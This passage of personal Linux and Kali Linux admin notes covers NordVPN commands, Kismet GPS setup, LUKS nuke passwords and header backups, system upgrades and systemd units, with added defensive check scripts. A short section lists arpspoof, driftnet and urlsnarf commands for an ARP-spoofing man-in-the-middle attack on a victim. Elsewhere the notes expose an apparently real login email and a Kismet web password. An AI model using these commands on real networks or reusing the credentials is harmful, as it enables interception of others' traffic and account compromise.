        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 13033  bytes 1533296 (1.4 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.171  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 2600:1700:43f0:d60:fee4:4b1e:201d:1d21  prefixlen 64  scopeid 0x0
        inet6 fe80::b27d:64ff:fee7:baa3  prefixlen 64  scopeid 0x20
        inet6 2600:1700:43f0:d60::30  prefixlen 128  scopeid 0x0
        inet6 2600:1700:43f0:d60:b27d:64ff:fee7:baa3  prefixlen 64  scopeid 0x0
        ether b0:7d:64:e7:ba:a3  txqueuelen 1000  (Ethernet)
        RX packets 37827  bytes 31302546 (29.8 MiB)
        RX errors 0  dropped 733  overruns 0  frame 0
        TX packets 21274  bytes 6021823 (5.7 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

https://support.nordvpn.com/Connectivity/Linux/1061938702/How-to-connect-to-NordVPN-using-Linux-Network-Manager.htm
https://wiki.archlinux.org/title/NordVPN#Settings
https://support.nordvpn.com/Connectivity/Linux/1047409422/How-can-I-connect-to-NordVPN-using-Linux-Terminal.htm

To access the NordVPN client settings, type the nordvpn command in Terminal. Here is the list of available commands:
nordvpn login - Log in.
nordvpn connect or nordvpn c - Connect to VPN. To connect to specific servers, use nordvpn connect (country_code server_number) (eg. nordvpn connect uk715)
nordvpn disconnect or nordvpn d - Disconnect from VPN.
nordvpn c double_vpn - Connect to the closest Double VPN server.
nordvpn connect --group double_vpn - Connect to a specific country using DoubleVPN servers.
nordvpn connect P2P - connect to a P2P server.
nordvpn connect The_Americas - connect to servers located in the Americas.
nordvpn connect Dedicated_IP - connect to a Dedicated IP server.
nordvpn set or nordvpn s - Set a configuration option. Possible options:
    nordvpn set cybersec on or off - Enable or disable CyberSec
    nordvpn set killswitch on or off - Enable or disable Kill Switch
    nordvpn set autoconnect on or off - Enable or disable auto-connect. You can set a specific server for automatic connection using nordvpn set autoconnect on country_code+server_number. Example: nordvpn set autoconnect on us2435.
    nordvpn set notify on or off - Enable or disable notifications
    nordvpn set dns 1.1.1.1 1.0.0.1 - Set custom DNS (you can set up a single DNS or two like shown in this command).
    nordvpn set protocol udp or tcp - Switch between UDP and TCP protocols
    nordvpn set obfuscate on or off - Enable or disable Obfuscated Servers.
    nordvpn set technology - Set connection technology (OpenVPN or NordLynx)
nordvpn whitelist add port 22 - Add a rule to whitelist a specified incoming port. You can also whitelist multiple ports, just separate their numbers with a space.
nordvpn whitelist remove port 22 - Remove the rule to whitelist a specified port.
nordvpn whitelist add subnet 192.168.0.0/16 - Add a rule to whitelist a specified subnet.
nordvpn whitelist remove subnet 192.168.0.0/16 - Remove the rule to whitelist a specified subnet.
nordvpn account - See account information
nordvpn register - Register a new user account
nordvpn rate - Rate your last connection quality (1-5)
nordvpn settings - See the current settings.
nordvpn status - See the connection status.
nordvpn countries - See the country list.
nordvpn cities - See the city list. E.g.: nordvpn cities united_states
nordvpn groups - See a list of available server groups.
nordvpn logout - Log out.
nordvpn help or nordvpn h - See the list of available commands or help for a specific command.
You can get an extensive explanation of all commands by using the man nordvpn command in Terminal.

nordvpn connect --group double_vpn Israel
sudo nordvpn connect Zurich Switzerland
$ sudo nordvpn connect sweden
Connecting to Sweden #578 (se578.nordvpn.com)
You are connected to Sweden #578 (se578.nordvpn.com)!

┌──(parth㉿Parth)-[/etc]
$ nordvpn login
Post "https://napps-1.com/v1/users/oauth/login?challenge=be8a988b4d8871c592f5885dc08f675c98806bcf859e9b968fb251e76cab1c5a&preferred_flow=login&redirect_flow=default": dial tcp: lookup napps-1.com on 192.168.1.1:53: write udp 192.168.1.160:37257->192.168.1.1:53: write: operation not permitted

┌──(parth㉿Parth)-[/etc]
$ nordvpn login --legacy
Please enter your login details.
Email: wbbellamy@gmail.com
Password: **************
It's not you, it's us.
We're having trouble reaching our servers. If the issue persists, please contact our customer support.

┌──(parth㉿Parth)-[/etc]
$ resolvectl status
Global
         Protocols: +LLMNR +mDNS -DNSOverTLS DNSSEC=no/unsupported
  resolv.conf mode: foreign
Current DNS Server: 12.127.16.67
       DNS Servers: 12.127.16.67 12.127.17.71 192.168.1.1
        DNS Domain: localdomain

Link 2 (eth0)
    Current Scopes: DNS LLMNR/IPv4 LLMNR/IPv6
         Protocols: +DefaultRoute +LLMNR -mDNS -DNSOverTLS DNSSEC=no/unsupported
       DNS Servers: 12.127.16.67 12.127.17.71
        DNS Domain: localdomain

Link 3 (wlan0)
    Current Scopes: DNS LLMNR/IPv4 LLMNR/IPv6
         Protocols: +DefaultRoute +LLMNR -mDNS -DNSOverTLS DNSSEC=no/unsupported
       DNS Servers: 192.168.1.1
        DNS Domain: localdomain

┌──(parth㉿Parth)-[/etc]
$ ip route
default via 10.32.10.1 dev eth0 proto dhcp src 10.32.10.194 metric 100
default via 192.168.1.1 dev wlan0 proto dhcp src 192.168.1.160 metric 600
10.32.10.0/24 dev eth0 proto kernel scope link src 10.32.10.194 metric 100
192.168.1.0/24 dev wlan0 proto kernel scope link src 192.168.1.160 metric 600

This seems to be part of the solution.
┌──(parth㉿Parth)-[/etc]
$ sudo ip addr flush dev wlan0
┌──(parth㉿Parth)-[/etc]
$ ip route
┌──(parth㉿Parth)-[/etc]
$ sudo dhclient wlan0
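Added here as a worked example (my own script, not NordVPN's): the notes check the tunnel by hand with nordvpn status, ip route, traceroute and resolv.conf. This automates that check so a leak is caught before anything sensitive goes out: it wants Status: Connected, the default route (or OpenVPN's 0.0.0.0/1 + 128.0.0.0/1 pair) on a tun or nordlynx device, and only the expected resolvers in resolv.conf. The DNS allow list defaults to the two NordVPN resolvers quoted above; the sample status, route and resolv.conf texts are constructed from the shapes seen in the notes.

```shell
#!/bin/sh
# Added example: VPN leak check over the three things the notes inspect by hand.
# All SAMPLE_* texts are constructed; NORD_DNS_ALLOW uses the resolvers quoted in the notes.

NORD_DNS_ALLOW="103.86.96.100 103.86.99.100"

SAMPLE_STATUS_UP='Status: Connected
Current server: us8052.nordvpn.com
Country: United States
City: Atlanta
Server IP: 92.119.17.75
Current technology: OPENVPN
Current protocol: UDP'
SAMPLE_STATUS_DOWN='Status: Disconnected'

SAMPLE_ROUTES_UP='0.0.0.0/1 via 10.8.3.1 dev tun0
default via 192.168.1.254 dev wlan0 proto dhcp src 192.168.1.171 metric 600
10.8.3.0/24 dev tun0 proto kernel scope link src 10.8.3.8
128.0.0.0/1 via 10.8.3.1 dev tun0
192.168.1.0/24 dev wlan0 proto kernel scope link src 192.168.1.171 metric 600'
SAMPLE_ROUTES_DOWN='default via 192.168.1.254 dev wlan0 proto dhcp src 192.168.1.171 metric 600
192.168.1.0/24 dev wlan0 proto kernel scope link src 192.168.1.171 metric 600'

SAMPLE_RESOLV_UP='domain nordvpn.com
nameserver 103.86.96.100
nameserver 103.86.99.100'
SAMPLE_RESOLV_LEAK='nameserver 103.86.96.100
nameserver 192.168.1.254'

# vpn_connected STATUS_TEXT -> yes/no from the "Status:" line of 'nordvpn status'
vpn_connected() {
    if printf '%s\n' "$1" | grep -q '^Status: Connected'; then echo yes; else echo no; fi
}

# tun_default_route ROUTE_TEXT -> yes if all default-covering routes leave via tun*/nordlynx
tun_default_route() {
    printf '%s\n' "$1" | awk '
        {
            dev = ""
            for (i = 1; i < NF; i++) if ($i == "dev") dev = $(i + 1)
            tun = (dev ~ /^(tun[0-9]*|nordlynx)$/)
            if ($1 == "default" && tun) full = 1
            if ($1 == "0.0.0.0/1" && tun) lo = 1
            if ($1 == "128.0.0.0/1" && tun) hi = 1
        }
        END { print (full || (lo && hi)) ? "yes" : "no" }'
}

# dns_via_vpn RESOLV_TEXT [ALLOWLIST] -> yes if every nameserver is in the allow list
dns_via_vpn() {
    printf '%s\n' "$1" | awk -v allow="${2:-$NORD_DNS_ALLOW}" '
        BEGIN { n = split(allow, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
        $1 == "nameserver" { seen++; if (!($2 in ok)) bad++ }
        END { print (seen > 0 && bad == 0) ? "yes" : "no" }'
}

# leak_check STATUS ROUTES RESOLV -> "OK" or "LEAK: ..." naming the failed checks
leak_check() {
    c=$(vpn_connected "$1"); r=$(tun_default_route "$2"); d=$(dns_via_vpn "$3")
    if [ "$c" = yes ] && [ "$r" = yes ] && [ "$d" = yes ]; then
        echo OK
    else
        echo "LEAK: connected=$c default_route_via_tunnel=$r dns_via_vpn=$d"
    fi
}

# Live use: sh thisfile --live   (reads the real nordvpn status, ip route and resolv.conf)
if [ "${1:-}" = "--live" ]; then
    leak_check "$(nordvpn status)" "$(ip route)" "$(cat /etc/resolv.conf)"
else
    leak_check "$SAMPLE_STATUS_UP" "$SAMPLE_ROUTES_UP" "$SAMPLE_RESOLV_UP"
fi
```

If you set custom resolvers with nordvpn set dns, pass them as the second argument of dns_via_vpn so the check tracks your own configuration instead of the Nord defaults.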
---[Kismet with GPS]--- (top)
Below is the original GPS section of /etc/kismet/kismet.conf
# GPS configuration
gps=serial:device=/dev/ttyACM0,reconnect=true,name=eyeinthesky
#
# Kismet supports multiple types of GPS. Generally you should only activate one of these
# options at a time.
#
# Only one process can open a serial or USB device at the same time; if you are using GPSD,
# make sure not to configure Kismet on the same serial port.
#
# For more information about the GPS types, see the documentation at:
# https://www.kismetwireless.net/docs/readme/gps/
#
# gps=serial:device=/dev/ttyACM0,name=eyeinthesky
# gps=tcp:host=1.2.3.4,port=4352
# gps=gpsd:host=localhost,port=2947
# gps=virtual:lat=123.45,lon=45.678,alt=1234
# gps=web:name=gpsweb
And to allow my GPS receiver to be used by Kismet I added this at the end of the example above.
gps=serial:device=/dev/ttyACM0
To start gpsd in interactive mode, type the command below.
$ sudo gpsd -D 5 -N -n /dev/ttyACM0

*** KISMET IS SHUTTING DOWN ***
Shutting down plugins...
WARNING: Kismet changes the configuration of network devices.
In most cases you will need to restart networking for your interface (varies per distribution/OS, but typically one of:
    sudo service networking restart
    sudo /etc/init.d/networking restart
or
    nmcli device set [device] managed true
Kismet exiting.
EXITING: Signal service thread complete.

$ sudo cat /root/.kismet/kismet_server_id.conf
server_uuid=51123638-E041-11EC-8F59-4B49534D4554
$ sudo cat /root/.kismet/kismet_httpd.conf
httpd_password=nNarana7H@^
httpd_username=Ben
Some resources
---[Convert mkv video files to mpg4]--- (top)
Single file conversion example.
$ ffmpeg -i example.mkv -c copy example.mp4
or
$ ffmpeg -i my_movie.mkv -vcodec copy -acodec copy my_movie.mp4
---[Convert mp4 to mp3]--- (top)
Start with the URL containing the mp4 you want to work with. Use youtube-dl to download the mp4.
These commands get the main video from the URL:
$ youtube-dl https://media.parkviewchurch.com/455/9587/44648
$ youtube-dl https://media.parkviewchurch.com/455/9587/44683
$ youtube-dl https://media.parkviewchurch.com/455/9587/44727
$ youtube-dl https://media.parkviewchurch.com/455/9587/44767
Now to extract the audio (mp3) from the audio/video (mp4): you can use VLC media player to do this. From the menu, choose Media > Convert/Save. Load your mp4, click Convert/Save, and there you can choose Audio - MP3. You can click the little config icon right beside Audio - MP3 to choose your bitrate etc., then choose the destination and filename.mp3. Fast and easy.
---[This is interesting]--- (top)
Related to this topic, review these for more info:
As penetration testers, we often need to travel with sensitive data stored on our laptops. Of course, we use full disk encryption wherever possible, including our Kali Linux machines, which tend to contain the most sensitive materials. Let’s configure a nuke password as a safety measure:
root@kali:~# apt install cryptsetup-nuke-password
root@kali:~# dpkg-reconfigure cryptsetup-nuke-password
The configured nuke password will be stored in the initrd and will be usable with all encrypted partitions that you can unlock at boot time.
Back up your LUKS keyslots and encrypt them:
cryptsetup luksHeaderBackup --header-backup-file luksheader.back /dev/sdb3
openssl enc -e -aes-256-cbc -in luksheader.back -out luksheader.back.enc
Now boot into your encrypted store, and give the nuke password rather than the real decryption password. This will render any info on the encrypted store useless. Once this is done, verify that the data is indeed inaccessible.
Let's restore the data now. We'll decrypt our backup of the LUKS keyslots, and restore them to the encrypted partition:
openssl enc -d -aes-256-cbc -in luksheader.back.enc -out luksheader.back
cryptsetup luksHeaderRestore --header-backup-file luksheader.back /dev/sdb3
Our slots are now restored. All we have to do is simply reboot and provide our normal LUKS password and the system is back to its original state.
How to configure the nuke password non-interactively: you need to preseed the password in the debconf database and then run dpkg-reconfigure in a way where it is not allowed to ask questions:
$ sudo debconf-set-selections <<END
cryptsetup-nuke-password cryptsetup-nuke-password/password string Th3Pa$$w0rd
cryptsetup-nuke-password cryptsetup-nuke-password/password-again string Th3Pa$$w0rd
END
$ sudo dpkg-reconfigure -f noninteractive cryptsetup-nuke-password
If you expect to make use of this nuke password, then you should consider backing up the LUKS header. That way, if your computer is seized and later given back to you, you will be able to restore the LUKS header and get back access to your data.
Here's the command to use (replace (device) with the path of the device file representing your LUKS encrypted partition, and (your-backup-file) with the path to the backup file to create):
$ sudo cryptsetup luksHeaderBackup (device) --header-backup-file (your-backup-file)
To later restore the header, you will have to do:
$ sudo cryptsetup luksHeaderRestore (device) --header-backup-file (your-backup-file)
Remember that you must back up the encryption keys (the LUKS header) to a separate location before testing the nuke, or the data will be irrecoverable.
Ref. https://docs.kali.org/kali-dojo/03-kali-linux-usb-persistence-encryption
Info on backing up LUKS header/password
https://www.cyberciti.biz/security/how-to-backup-and-restore-luks-header-on-linux/
[13:15:32 benb ~/Current.Papers] $ cat /etc/fstab /etc/crypttab
# /etc/fstab: static file system information.
#
# Use 'blkid' to print the universally unique identifier for a
# device; this may be used with UUID= as a more robust way to name devices
# that works even if disks are added and removed. See fstab(5).
#
/dev/mapper/mint--vg-root /               ext4    errors=remount-ro 0       1
# /boot was on /dev/sda1 during installation
UUID=3d0df7bd-7a24-4450-84bd-744f43f3cb10 /boot           ext4    defaults        0       2
/dev/mapper/mint--vg-swap_1 none            swap    sw              0       0
sda5_crypt UUID=a2f5b84f-5ecd-4bf0-9b3e-651211824187 none luks,discard

[13:15:33 benb ~/Current.Papers] $ sudo dmsetup ls --target crypt
[sudo] password for ben:
sda5_crypt	(253, 0)

[13:16:45 benb ~/Current.Papers] $ lsblk
NAME                  MAJ:MIN RM   SIZE RO TYPE  MOUNTPOINT
sda                     8:0    0 931.5G  0 disk
├─sda1                  8:1    0   731M  0 part  /boot
├─sda2                  8:2    0     1K  0 part
└─sda5                  8:5    0 930.8G  0 part
  └─sda5_crypt        253:0    0 930.8G  0 crypt
    ├─mint--vg-root   253:1    0 929.8G  0 lvm   /
    └─mint--vg-swap_1 253:2    0   976M  0 lvm   [SWAP]
sr0                    11:0    1  1024M  0 rom

[13:17:09 benb ~/Current.Papers] $ lsblk /dev/sda5
NAME                  MAJ:MIN RM   SIZE RO TYPE  MOUNTPOINT
sda5                    8:5    0 930.8G  0 part
└─sda5_crypt          253:0    0 930.8G  0 crypt
  ├─mint--vg-root     253:1    0 929.8G  0 lvm   /
  └─mint--vg-swap_1   253:2    0   976M  0 lvm   [SWAP]
[13:17:33 benb ~/Current.Papers] ╼
To recover data from encrypted files/volumes, back up the following:
  /etc/fstab file
  /etc/crypttab file
  LUKS header
Run the command to find out information about the encrypted disks or volumes:
$ sudo cryptsetup luksDump /dev/DEVICE
$ sudo cryptsetup luksDump /dev/sdb2
$ sudo cryptsetup luksDump /dev/md1
Step 2 – Backing up LUKS header
Make a backup of your LUKS header for future use:
$ sudo cryptsetup luksHeaderBackup /dev/DEVICE --header-backup-file /path/to/backupfile
$ sudo cryptsetup luksHeaderBackup /dev/sdb2 --header-backup-file /nas/vivek/laptop.dell.m6700.luks.bin
$ sudo cryptsetup luksHeaderBackup /dev/md1 --header-backup-file /root/laptop.thinkpad.luks.bin
To show information about the backup file named /root/laptop.thinkpad.luks.bin, run the file, stat or cryptsetup command:
$ sudo file /root/laptop.thinkpad.luks.bin
$ sudo stat /root/laptop.thinkpad.luks.bin
$ sudo cryptsetup luksDump /root/laptop.thinkpad.luks.bin
WARNING – Make sure you store the backup file /root/laptop.thinkpad.luks.bin securely offline (I use my home NAS server and a USB stick). This file must remain off the device; otherwise, you may not be able to restore it.
Step 3 – Restoring LUKS header when needed
Now let us say something terrible happened. All you have to do is boot your system/laptop from a boot disk and restore the old LUKS header from the laptop.thinkpad.luks.bin backup file as follows:
# cryptsetup luksHeaderRestore /dev/DEVICE --header-backup-file /path/to/backup_header_file
## Assuming that you mounted /nas/ using NFS ##
# cryptsetup luksHeaderRestore /dev/md1 --header-backup-file /nas/vivek/laptop.thinkpad.luks.bin
Step 4 – Test it
Run the following commands to open the encrypted disk and mount it (you need to provide the old password):
# cryptsetup luksOpen /dev/DEVICE name
# cryptsetup luksOpen /dev/md1 test
# mkdir /test
# mount /dev/mapper/test_root /test
# df -H
# mount
Reboot the Linux system:
# reboot
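A quick offline sanity check for the header backup file, added here as an example (it is not from cryptsetup or from the notes above): it confirms the file starts with the LUKS magic, reads the version field, and records a SHA-256 beside the backup so a copy on the NAS or USB stick can be verified later. File names are placeholders; cryptsetup luksDump on the backup, as above, remains the authoritative check.

```shell
#!/bin/sh
# Added example: offline checks on a LUKS header backup file.
# A LUKS header begins with the 6-byte magic "LUKS" 0xba 0xbe followed by a
# big-endian 16-bit version (1 or 2).  cryptsetup luksDump <file> is the real
# check; this only catches "I backed up the wrong thing" and bit rot.

luks_header_check() {
    f=$1
    [ -r "$f" ] || { echo "$f: not readable" >&2; return 1; }
    magic=$(dd if="$f" bs=1 count=6 2>/dev/null | od -A n -t x1 | tr -d ' \n')
    if [ "$magic" != "4c554b53babe" ]; then
        echo "$f: not a LUKS header (magic '$magic')" >&2
        return 1
    fi
    version=$(dd if="$f" bs=1 skip=6 count=2 2>/dev/null | od -A n -t x1 | tr -d ' \n')
    case $version in
        0001) echo LUKS1 ;;
        0002) echo LUKS2 ;;
        *) echo "$f: unknown LUKS version '$version'" >&2; return 1 ;;
    esac
}

# Store a SHA-256 next to the backup (FILE.sha256) and verify it later, so a
# corrupted copy is noticed before the day it is needed.
luks_header_record() {
    ( cd "$(dirname "$1")" && sha256sum "$(basename "$1")" > "$(basename "$1").sha256" )
}
luks_header_verify() {
    ( cd "$(dirname "$1")" && sha256sum -c "$(basename "$1").sha256" >/dev/null 2>&1 )
}

# Constructed sample data for the demo (not a real header): magic + version 2,
# padded with zeros; or plain junk for the negative case.
make_sample_header() {   # $1 = file, $2 = "luks2" or "junk"
    if [ "$2" = luks2 ]; then
        printf 'LUKS\272\276\000\002' > "$1"
        dd if=/dev/zero bs=512 count=1 2>/dev/null >> "$1"
    else
        printf 'definitely not a header' > "$1"
    fi
}

if [ "${1:-}" = demo ]; then
    t=$(mktemp)
    make_sample_header "$t" luks2
    luks_header_check "$t" && luks_header_record "$t" && luks_header_verify "$t" && echo "backup ok"
    rm -f "$t" "$t.sha256"
fi
```

Run `sh luks_check.sh demo` for the self-test, or `luks_header_check /root/laptop.thinkpad.luks.bin` on a real backup right after luksHeaderBackup and again after copying it off the machine.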
There is a good example of setting up and using Timeshift to create snapshots on a USB drive. https://linuxhint.com/timeshift_linux_mint_usb/
---[Burning Kali to an SD or MicroSD]--- (top)
Locate the mount point of the SD card
$ lsblk -p
NAME             MAJ:MIN RM   SIZE RO TYPE MOUNTPOINT
/dev/sda           8:0    0 931.5G  0 disk
├─/dev/sda1        8:1    0  39.2M  0 part
├─/dev/sda2        8:2    0  21.7G  0 part
├─/dev/sda3        8:3    0 454.4G  0 part
├─/dev/sda4        8:4    0     1K  0 part
└─/dev/sda5        8:5    0 455.4G  0 part /
/dev/sr0          11:0    1  1024M  0 rom
/dev/mmcblk0     179:0    0  14.9G  0 disk
└─/dev/mmcblk0p1 179:1    0  14.9G  0 part /media/parth/6536-6233
Extract the .xz file to get the .img file downloaded from Kali.
Burn .img to SD (not to a partition on the SD)
sudo dd bs=4M if=kali-linux-2019.3a-rpi3-nexmon-64.img of=/dev/mmcblk0 status=progress conv=fsync
---[Change desktop in Kali]--- (top)
apt -y install kali-desktop-xfce
---[Upgrade to New Version of Kali]--- (top)
cat <<EOF > /etc/apt/sources.list
deb http://http.kali.org/kali kali-rolling main non-free contrib
EOF
sudo apt update && sudo apt -y full-upgrade
[ -f /var/run/reboot-required ] && reboot -f
grep VERSION /etc/os-release
uname -v
You can also do the following;
See https://www.kali.org/docs/general-use/kali-linux-sources-list-repositories/
echo "deb http://http.kali.org/kali kali-rolling main contrib non-free" | sudo tee /etc/apt/sources.list
echo "deb-src http://http.kali.org/kali kali-rolling main contrib non-free" | sudo tee -a /etc/apt/sources.list   # optional: source packages
sudo apt upgrade
sudo apt full-upgrade -y
sudo apt dist-upgrade
sudo apt autoremove
sudo reboot
Update your shell configurations:
cp -rbi /etc/skel/. ~
Check the release:
lsb_release -a
cat /etc/os-release
Check the kernel:
uname -a
uname -r
┌──(parth㉿Parth)-[~]
└─$ lsb_release -a
No LSB modules are available.
Distributor ID: Kali
Description:    Kali GNU/Linux Rolling
Release:        2022.3
Codename:       kali-rolling
┌──(parth㉿Parth)-[~]
└─$ lsb_release -r
Release:        2022.3
┌──(parth㉿Parth)-[~]
└─$ uname -a
Linux Parth 5.18.0-kali7-amd64 #1 SMP PREEMPT_DYNAMIC Debian 5.18.16-1kali1 (2022-08-31) x86_64 GNU/Linux
┌──(parth㉿Parth)-[~]
└─$ uname -r
5.18.0-kali7-amd64
---[Sending a signal to a process]--- (top)
$ kill -l
 1) SIGHUP       2) SIGINT       3) SIGQUIT      4) SIGILL       5) SIGTRAP
 6) SIGABRT      7) SIGBUS       8) SIGFPE       9) SIGKILL     10) SIGUSR1
11) SIGSEGV     12) SIGUSR2     13) SIGPIPE     14) SIGALRM     15) SIGTERM
16) SIGSTKFLT   17) SIGCHLD     18) SIGCONT     19) SIGSTOP     20) SIGTSTP
21) SIGTTIN     22) SIGTTOU     23) SIGURG      24) SIGXCPU     25) SIGXFSZ
26) SIGVTALRM   27) SIGPROF     28) SIGWINCH    29) SIGIO       30) SIGPWR
31) SIGSYS      34) SIGRTMIN    35) SIGRTMIN+1  36) SIGRTMIN+2  37) SIGRTMIN+3
38) SIGRTMIN+4  39) SIGRTMIN+5  40) SIGRTMIN+6  41) SIGRTMIN+7  42) SIGRTMIN+8
43) SIGRTMIN+9  44) SIGRTMIN+10 45) SIGRTMIN+11 46) SIGRTMIN+12 47) SIGRTMIN+13
48) SIGRTMIN+14 49) SIGRTMIN+15 50) SIGRTMAX-14 51) SIGRTMAX-13 52) SIGRTMAX-12
53) SIGRTMAX-11 54) SIGRTMAX-10 55) SIGRTMAX-9  56) SIGRTMAX-8  57) SIGRTMAX-7
58) SIGRTMAX-6  59) SIGRTMAX-5  60) SIGRTMAX-4  61) SIGRTMAX-3  62) SIGRTMAX-2
63) SIGRTMAX-1  64) SIGRTMAX
Send signal 15 (SIGTERM) to PID 1234. The signal number takes a leading dash; without it, 15 would be read as a second PID:
sudo kill -15 1234
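As an added example (not from the notes above), a graceful-stop helper built on the two signals that matter most in that list: SIGTERM (15), which a process can catch to clean up, and SIGKILL (9), which it cannot catch and which is therefore the fallback rather than the first move. The demo processes are constructed, and the 60-second sleeps are placeholders.

```shell
#!/bin/sh
# Added example: stop a process with SIGTERM first and SIGKILL only if it
# has not gone away after a grace period.

# True if PID exists and is not a zombie.  A child that has died but not yet
# been reaped still answers kill -0, so the state field of /proc/PID/stat is
# checked too where /proc exists.
is_alive() {
    kill -0 "$1" 2>/dev/null || return 1
    [ -r "/proc/$1/stat" ] || return 0
    state=$(sed 's/^.*) //' "/proc/$1/stat" | cut -d' ' -f1)
    [ "$state" != "Z" ]
}

# Usage: stop_gracefully PID [GRACE_SECONDS]   (default 5)
# Returns 0 if the process exited on SIGTERM, 1 if SIGKILL was needed.
stop_gracefully() {
    pid=$1; grace=${2:-5}; i=0
    is_alive "$pid" || { echo "pid $pid: not running"; return 0; }
    kill -TERM "$pid" 2>/dev/null          # same as: kill -15 "$pid"
    while [ "$i" -lt "$grace" ]; do
        is_alive "$pid" || { echo "pid $pid: exited after SIGTERM"; return 0; }
        sleep 1; i=$((i + 1))
    done
    kill -KILL "$pid" 2>/dev/null          # same as: kill -9 "$pid"
    echo "pid $pid: ignored SIGTERM for ${grace}s, sent SIGKILL"
    return 1
}

# Demo processes (constructed): a normal sleep, and one that ignores SIGTERM,
# which is the case the SIGKILL fallback exists for.  Sets SPAWNED_PID.
spawn_demo() {   # $1 = "stubborn" to ignore SIGTERM
    if [ "${1:-}" = stubborn ]; then
        ( trap '' TERM; exec sleep 60 ) &
    else
        sleep 60 &
    fi
    SPAWNED_PID=$!
}

if [ "${1:-}" = demo ]; then
    spawn_demo;          stop_gracefully "$SPAWNED_PID" 3
    spawn_demo stubborn; stop_gracefully "$SPAWNED_PID" 2 || true
fi
```

Run it with `sh stop.sh demo` to see both paths; in scripts, call `stop_gracefully "$pid" 10` and treat a return of 1 as something worth logging, since a service that needs SIGKILL is usually a service that did not flush what it was doing.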
---[Backup Installed Packages]--- (top)
Backup Installed Packages And Restore Them Later On Freshly Installed Ubuntu System. https://www.ostechnix.com/backup-installed-packages-and-restore-them-on-freshly-installed-ubuntu-system/
$ sudo apt install apt-clone
$ mkdir ~/mypackages
$ sudo apt-clone clone ~/mypackages
You may need to download the .deb package and use apt to install it.
$ sudo apt install ./apt-clone_0.4.1_all.deb
$ sudo apt-clone clone my.system/ --with-dpkg-repack
Use this to include .deb packages
$ sudo apt-clone clone --with-dpkg-repack ~/mypackages
Creates this archive:
~/mypackages/apt-clone-state-ubuntuserver.tar.gz
apt-clone info mypackages/apt-clone-state-ubuntuserver.tar.gz
To reinstall
sudo apt-clone restore apt-clone-state-ubuntuserver.tar.gz
$ apt-clone info my.system/apt-clone-state-benbellamy.tar.gz
Hostname: benbellamy
Arch: amd64
Distro: kali-rolling
Meta:
Installed: 3078 pkgs (2840 automatic)
Date: Mon Jul 20 21:15:01 2020
Run the following command to restore it.
$ sudo apt-clone restore /opt/apt-clone-state-Ubuntu18.2daygeek.com.tar.gz
Note: The restore will override your existing /etc/apt/sources.list and will install/remove packages. So be careful.
---[To install all of Kali's tools]--- (top)
sudo apt update
sudo apt install kali-linux-everything
arpspoof - ARP spoofing using a man-in-the-middle Attack
This needs to be fleshed out and tested. See https://linuxhint.com/arp_spoofing_using_man_in_the_middle_attack/
Also study https://rootinstall.com/tutorial/arp-spoofing-in-linux-using-arping/
ip route show
sysctl -w net.ipv4.ip_forward=1
arpspoof -i [Network Interface Name] -t [Victim IP] [Router IP]
arpspoof -i [Network Interface Name] -t [Router IP] [Victim IP]
driftnet -i [Network Interface Name]
urlsnarf -i [Network interface name]
sysctl -w net.ipv4.ip_forward=0
---[How to list all installed applications/packages]--- (top)
To list packages using apt command:
apt list --installed
To list packages using dpkg command:
dpkg-query -l or dpkg --get-selections
---[Template]--- (top)
Add startup.script.sh to systemd and run it at boot. Create the shell script and set it to executable. Typically you'd move it to /usr/bin.
#!/bin/bash
DATE=$(date '+%Y-%m-%d %H:%M:%S')
echo "Example service started at ${DATE}"
echo "$DATE"
sleep 10
exit 0
---[Create a service file]--- (top)
Save it as /etc/systemd/system/test.service:
[Unit]
Description=Startup Script
After=network.target

[Service]
Type=simple
WorkingDirectory=/home/parth/
ExecStart=/bin/bash test_service.sh

[Install]
WantedBy=multi-user.target
Reload the systemctl daemon:
systemctl daemon-reload
Tell systemd to enable your custom system unit:
systemctl enable test.service
Confirm that your test service was created successfully:
systemctl --all | grep test.service
Start your service:
systemctl start test.service
Ref. https://help.skysilk.com/support/solutions/articles/9000162390-how-to-start-a-program-or-script-on-linux-automatically-on-boot-with-systemd
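The unit above runs as root (no User= line) and starts a script named by a relative path inside a home directory, so whoever can write that directory controls what root runs at boot. As an added example (not from the notes or from systemd), a small audit that flags those three things in a unit file, run here against a constructed copy of the unit above and a hardened rewrite of it. The hardened unit's user name and paths are placeholders.

```shell
#!/bin/sh
# Added example: audit a systemd unit for the settings that turn a boot-time
# script into a privilege escalation path.

# Usage: audit_unit FILE   -> prints findings; return value = number found
audit_unit() {
    unit=$1; found=0
    exec_line=$(grep '^ExecStart=' "$unit" | head -n 1 | cut -d= -f2-)
    case $exec_line in
        *"/bin/sh "*|*"/bin/bash "*)
            # interpreter + script: the script is resolved against
            # WorkingDirectory at boot unless it is an absolute path
            script=$(printf '%s\n' "$exec_line" | awk '{print $2}')
            case $script in
                /*|"") ;;
                *) echo "ExecStart runs '$script' by relative path (resolved against WorkingDirectory at boot)"
                   found=$((found + 1)) ;;
            esac ;;
    esac
    grep -q '^User=' "$unit" || {
        echo "no User= line: the service runs as root"
        found=$((found + 1))
    }
    wd=$(grep '^WorkingDirectory=' "$unit" | head -n 1 | cut -d= -f2-)
    case $wd in
        /home/*|/tmp/*)
            echo "WorkingDirectory '$wd' is user-writable territory"
            found=$((found + 1)) ;;
    esac
    return "$found"
}

# Constructed samples: the unit from the notes above, and a hardened rewrite
# (absolute script path outside any home directory, dedicated user, sandboxing).
write_weak_unit() {
    cat > "$1" <<'EOF'
[Unit]
Description=Startup Script
After=network.target
[Service]
Type=simple
WorkingDirectory=/home/parth/
ExecStart=/bin/bash test_service.sh
[Install]
WantedBy=multi-user.target
EOF
}
write_hardened_unit() {
    cat > "$1" <<'EOF'
[Unit]
Description=Startup Script
After=network.target
[Service]
Type=simple
User=svc-startup
WorkingDirectory=/var/lib/startup-script
ExecStart=/usr/local/bin/test_service.sh
NoNewPrivileges=yes
ProtectSystem=strict
ProtectHome=yes
PrivateTmp=yes
[Install]
WantedBy=multi-user.target
EOF
}

if [ "${1:-}" = demo ]; then
    t=$(mktemp); write_weak_unit "$t"
    audit_unit "$t"; echo "findings: $?"
    rm -f "$t"
fi
```

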